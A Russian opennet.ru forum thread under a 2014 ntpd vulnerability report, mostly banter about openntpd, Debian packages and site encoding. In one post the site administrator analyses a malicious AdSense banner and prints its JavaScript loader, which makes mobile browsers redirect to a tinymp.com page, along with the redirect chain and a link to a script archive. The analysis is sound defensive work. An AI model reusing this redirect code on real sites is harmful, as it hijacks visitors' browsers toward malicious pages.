Может у него винда и он просто вирусов нацеплял? Там такого добра - хоть отбавляй.


Ответить | Правка | ^ к родителю #43 | Наверх | Cообщить модератору

24. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +1 +/
Сообщение от Maxim Chirkov email(ok) on 20-Дек-14, 10:42 
> Простите за оффтоп. Но напишу: люблю я почитать ваш сайт, чаще всего
> я делаю это с смартфона. Ну вот, решил я сегодня почитать
> новости, меня перекидывает на рекламу UC Browser, с текстом типа "Для
> просмотра этого сайта установите UC Browser".

На opennet.ru не практикуется размещение всплывающей рекламы и автоматический переброс куда-то. На http://m.opennet.ru вообще никакой рекламы быть не должно.

Наиболее вероятно у вас в смартфоне завелось вредоносное ПО. Попробуйте проверить систему антивирусом. Другое предположение, что вы пользуйтесь беспроводной сетью, подставляющей в трафик свою рекламу. Сообщения об автоматическом открытии рекламных ссылок ко мне периодически поступают, но все они сводились к этим двум причинам.

Напишите, на базе какой ОС у вас смартфон, какой браузер, через какого провайдера выходите в сеть, наблюдается ли подобное для других сайтов, открывайте мобильную или обычную редакцией сайта, на какую страницу перекидывает?


Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

37. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –1 +/
Сообщение от Аноним (??) on 20-Дек-14, 16:50 
Максим, а у меня другой вопрос. Можно ли перевести опеннет на утф-8? Кажется, время кои8р уже давно прошло.
Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

52. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Maxim Chirkov email(ok) on 21-Дек-14, 00:46 
Нереально, слишком много возни с перекодировкой и много чего переделывать придётся.
Ответить | Правка | ^ к родителю #37 | Наверх | Cообщить модератору

51. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +3 +/
Сообщение от Maxim Chirkov email(ok) on 21-Дек-14, 00:20 
Причина оказалась в Google AdSense. Там кто-то разместил html5-баннер, который показыется только для мобильных браузеров и меняет location.href и перебрасывает на левую страницу. Не ожидал такого недосмотра от Google. До разбирательства отключил код AdSense с сайта.  Жалобу в Google отправил, но когда у них руки дойдут непонятно.


Поймать этот вредоносный баннер можно на http://www.opennet.me/test/1.html Если почистить Cookie и поставить в User Agent идентификатор Chrome для Android (например,  в Firefox это можно сделать через дополнение User Agent Overrider), то через несколько перезагрузок страницы тот баннер ловится.

Переброс осуществляется на http://www.opennet.me.tinymp.com/uc.php (на других сайтах вместо "www.opennet.ru" после ".tinymp.com" прописывается текущий домен)

затем на
http://click.union.ucweb.com/index.php?service=RedirectServi...

http://hwoxt.com/?a=510746&c=1281273&m=24&s1=test20


Свойственные для проблемного баннера обращения к AdSense:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-...

http://adx.stcounter.com/adx.js?kcid=51435b3f35749150bf00080...

http://googleads.g.doubleclick.net/pagead/adview?ai=CzVkCEN-...


Проблемный код, который вызывает переход:

try{function callKonvertaZP(src) {if (typeof(src) == 'undefined') return; var d = document, b=d.body; if(src.toUpperCase().indexOf('HTTP://')==0||src.toUpperCase().indexOf('HTTPS://')==0) try{var img = d.createElement('IMG'); var s = src.replace(/%random%/, Math.round(Math.random()*9999999)); with(img.style){position = 'absolute'; width = '0px'; height = '0px';} img.src = s; b.insertBefore(img, b.firstChild);}catch(e){}}
var konverta_ad_href = '';
try{konverta_ad_href=(window.top || window.self).location.href;konverta_ad_href=encodeURIComponent(konverta_ad_href);}catch(e){}
function trackKonvertaClick() {callKonvertaZP('http://adclick.g.doubleclick.net/aclk?sa=l&ai=Coo2lEN-VVPj3C...');}

  (function() {
    var wc = document.createElement('script'); wc.type = 'text/javascript'; wc.async = true;
    wc.src = 'https://pix.stcounter.com/wcjs2.php?r=www.opennet.ru&r2=Mozi...';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wc, s);
  })();

callKonvertaZP('http://pix.stcounter.com/adx.gif?bid=514b006435749149c200000...');}catch(e){}


В частности, кусок

  wc.src = 'https://pix.stcounter.com/wcjs2.php?r=www.opennet.ru&r2=Mozi...';

приводит к получению строки

setTimeout("window.top.location.href='http://www.opennet.me.tinymp.com/uc.php?random=1ee46b4c2993b...';", 100);

которая затем выполняется  кодом:

  var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wc, s);

Полный архив со слепком проблемных скриптов http://www.opennet.me/test/1.tgz (проблемный код в 1_files/ads_data/adx.js)

Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

64. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 21-Дек-14, 05:51 
Вот теперь все нормально, спасибо!
Ответить | Правка | ^ к родителю #51 | Наверх | Cообщить модератору

18. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 20-Дек-14, 08:18 
> Отправив специальным образом оформленный пакет

Уточните, куда отправить. И кто примет. У меня компьютер не имеет открытых портов и слушателей на них. Поэтому вопрос, как?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

20. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +3 +/
Сообщение от Нанобот (ok) on 20-Дек-14, 09:15 
Отправлять нужно по почте заказным письмом
Куда - не принципиально, главное, чтобы там было психиатрическое отделение
Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

22. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 20-Дек-14, 10:09 
Уважаемый автор, спасибо за содержательное дополнение к Вашей статье.
Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

19. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –1 +/
Сообщение от Аноним (??) on 20-Дек-14, 09:10 
Юзайте openntpd от Тео.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

23. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –6 +/
Сообщение от Аноним (??) on 20-Дек-14, 10:12 
Очень актуально для Раши, когда часовые пояса меняются как бог на душу положит. Посему рекомендация - отключить синхронизацию совсем.
Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

27. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +2 +/
Сообщение от EHLO on 20-Дек-14, 12:19 
> Очень актуально для Раши, когда часовые пояса меняются как бог на душу
> положит. Посему рекомендация - отключить синхронизацию совсем.

ntp не связан часовыми поясами.

Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

30. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +4 +/
Сообщение от Аноним (??) on 20-Дек-14, 13:50 
>> Очень актуально для Раши, когда часовые пояса меняются как бог на душу
>> положит. Посему рекомендация - отключить синхронизацию совсем.
> ntp не связан часовыми поясами.

Для доморощенных политолухов технические подробности не важны. Им главное про рашку поудачнее ввернуть.

Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

38. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +1 +/
Сообщение от anonymous (??) on 20-Дек-14, 19:32 
> Юзайте openntpd от Тео.

openntpd на линуксе по сути не поддерживается и имеет худшую точность, по сравнению с isc ntpd. Подробности есть в гугле, извините, искать лень.

Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

39. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от pavel_simple (ok) on 20-Дек-14, 20:54 
>> Юзайте openntpd от Тео.
> openntpd на линуксе по сути не поддерживается и имеет худшую точность, по
> сравнению с isc ntpd. Подробности есть в гугле, извините, искать лень.

lsb_release -ir
Distributor ID:    Debian
Release:    7.7
apt-cache search openntpd
openntpd - OpenBSD NTP daemon

Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

55. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 21-Дек-14, 01:36 
Иногда лучше жевать, чем говорить.

OpenNTPD is primarily developed by Henning Brauer as part of the OpenBSD Project and gets released as part of it every six months. ***The portable version is outdated and in need of a maintainer.***

Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору

61. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 21-Дек-14, 02:22 
> ***The portable version is outdated and in need of a maintainer.***

Если быть точным, последняя версия openntpd "для унтерменшей" датируется апрелем 2008 года.

Хотя сам по себе проект вполне жив - например, Revision 1.55, Thu Nov 20 05:51:20 2014 UTC (4 weeks, 2 days ago) by jsg. Просто он релизится строго в составе OpenBSD base system.

Ответить | Правка | ^ к родителю #55 | Наверх | Cообщить модератору

65. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –1 +/
Сообщение от pavel_simple (ok) on 21-Дек-14, 09:39 
>> ***The portable version is outdated and in need of a maintainer.***
> Если быть точным, последняя версия openntpd "для унтерменшей" датируется апрелем 2008 года.
> Хотя сам по себе проект вполне жив - например, Revision 1.55, Thu
> Nov 20 05:51:20 2014 UTC (4 weeks, 2 days ago) by
> jsg. Просто он релизится строго в составе OpenBSD base system.

поздравляю, в Debian'е своих сопровождающих есть
mkdir -p /tmp/asd
cd /tmp/asd

apt-get source openntpd
Reading package lists... Done
Building dependency tree      
Reading state information... Done
NOTICE: 'openntpd' packaging is maintained in the 'Git' version control system at:
git://git.debian.org/collab-maint/openntpd.git/
Need to get 191 kB of source archives.
Get:1 http://ftp.debian.org/debian/ wheezy-backports/main openntpd 20080406p-7~bpo70+1 (dsc) [1 928 B]
Get:2 http://ftp.debian.org/debian/ wheezy-backports/main openntpd 20080406p-7~bpo70+1 (tar) [176 kB]
Get:3 http://ftp.debian.org/debian/ wheezy-backports/main openntpd 20080406p-7~bpo70+1 (diff) [13,6 kB]
Fetched 191 kB in 1s (113 kB/s)      
dpkg-source: info: extracting openntpd in openntpd-20080406p
dpkg-source: info: unpacking openntpd_20080406p.orig.tar.gz
dpkg-source: info: unpacking openntpd_20080406p-7~bpo70+1.debian.tar.gz
dpkg-source: info: applying 01-use-debian-ntp-pool.patch
dpkg-source: info: applying 02-warn-unsupp-servers.patch
dpkg-source: info: applying 03-manpage-no-server-by-default.patch
dpkg-source: info: applying 04-syslog.patch
dpkg-source: info: applying 05-fix-kfreebsd-ftbfs.patch
dpkg-source: info: applying 06-pid.patch
dpkg-source: info: applying 07-dnstimeout.patch
cd openntpd-20080406p/debian/patches/
ls -la
total 40
drwxr-xr-x 2 user user 4096 Дек 24  2013 .
drwxr-xr-x 5 user user 4096 Апр 17  2014 ..
-rw-r--r-- 1 user user  560 Дек 24  2013 01-use-debian-ntp-pool.patch
-rw-r--r-- 1 user user  999 Дек 24  2013 02-warn-unsupp-servers.patch
-rw-r--r-- 1 user user  826 Дек 24  2013 03-manpage-no-server-by-default.patch
-rw-r--r-- 1 user user 1040 Дек 24  2013 04-syslog.patch
-rw-r--r-- 1 user user  630 Дек 24  2013 05-fix-kfreebsd-ftbfs.patch
-rw-r--r-- 1 user user 3581 Дек 24  2013 06-pid.patch
-rw-r--r-- 1 user user 1273 Дек 24  2013 07-dnstimeout.patch
-rw-r--r-- 1 user user  173 Дек 24  2013 series

Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

67. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –3 +/
Сообщение от Куяврег on 21-Дек-14, 15:07 
>> ***The portable version is outdated and in need of a maintainer.***
> Если быть точным, последняя версия openntpd "для унтерменшей" датируется апрелем 2008 года.

вот про это я и говорю. аптгетчикам уже мало исходников, им надо, чтобы кто-то им готовые пакеты выкатывал. опенсорс нужен как повод визжать по форумам.


Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

70. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –1 +/
Сообщение от pavel_simple (ok) on 21-Дек-14, 16:17 

> вот про это я и говорю. аптгетчикам уже мало исходников, им надо,
> чтобы кто-то им готовые пакеты выкатывал. опенсорс нужен как повод визжать
> по форумам.

завидовать нужно молча

Ответить | Правка | ^ к родителю #67 | Наверх | Cообщить модератору

74. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –1 +/
Сообщение от Куяврег on 21-Дек-14, 17:01 
> завидовать нужно молча

согласен. непонятно, почему тогда ты рот раскрыл.


Ответить | Правка | ^ к родителю #70 | Наверх | Cообщить модератору

81. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от pavel_simple (ok) on 21-Дек-14, 18:31 
>> завидовать нужно молча
> согласен. непонятно, почему тогда ты рот раскрыл.

поздравляю -- тест пройден и ты продолжаешь гавкать, значит и на apt-get и на aptitude реакция у тебя одинакова. осталось выяснить причины столь странного поведения, и я хоть не большой специалист в области переферийной нервной деятельности псовых, но могу заметить что данное поведение нетипично и подлежит пристальному глубокому изучению.

Ответить | Правка | ^ к родителю #74 | Наверх | Cообщить модератору

86. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +2 +/
Сообщение от Аноним (??) on 21-Дек-14, 18:48 
Два имбeцила встретились. Алилуйя.
Ответить | Правка | ^ к родителю #81 | Наверх | Cообщить модератору

88. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –1 +/
Сообщение от pavel_simple (ok) on 21-Дек-14, 18:53 
> Два имбeцила встретились. Алилуйя.

дык не два, бери выше и не отказывате нам в вашем обществе.

Ответить | Правка | ^ к родителю #86 | Наверх | Cообщить модератору

90. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +1 +/
Сообщение от Аноним (??) on 21-Дек-14, 18:59 
Не в обиду вам, два alicebot'а намного более интеллектуальные беседы ведут.
Ответить | Правка | ^ к родителю #88 | Наверх | Cообщить модератору

91. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –1 +/
Сообщение от pavel_simple (ok) on 21-Дек-14, 19:17 
> Не в обиду вам, два alicebot'а намного более интеллектуальные беседы ведут.

что-вы, ниразу, вот ты поди сейчас тоже считаешь что "беседует" с тобой человек, а вот почему ты так решил? тото-же!

Ответить | Правка | ^ к родителю #90 | Наверх | Cообщить модератору

85. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 21-Дек-14, 18:47 
> openntpd на линуксе по сути не поддерживается и имеет худшую точность, по
> сравнению с isc ntpd. Подробности есть в гугле, извините, искать лень.

Но с другой стороны его точности зачастую достаточно, он делает свое дело и весит хренадцать кило.


Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

102. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 22-Дек-14, 14:41 
>> openntpd на линуксе по сути не поддерживается и имеет худшую точность, по
>> сравнению с isc ntpd. Подробности есть в гугле, извините, искать лень.
> Но с другой стороны его точности зачастую достаточно, он делает свое дело
> и весит хренадцать кило.

Стесняюсь спросить, сколько дыр может быть в не поддерживаемом коде с шестилетней коркой плесени.

Ответить | Правка | ^ к родителю #85 | Наверх | Cообщить модератору

31. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 20-Дек-14, 14:45 
И таки вроде бы простые программы содержат уязвимости. kiss уже совсем не рулит?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

32. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –1 +/
Сообщение от Аноним (??) on 20-Дек-14, 14:47 
а ежели нету в конфиге включенной криптографии?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

72. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (??) on 21-Дек-14, 16:35 
> а ежели нету в конфиге включенной криптографии?

Тады ой.

Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру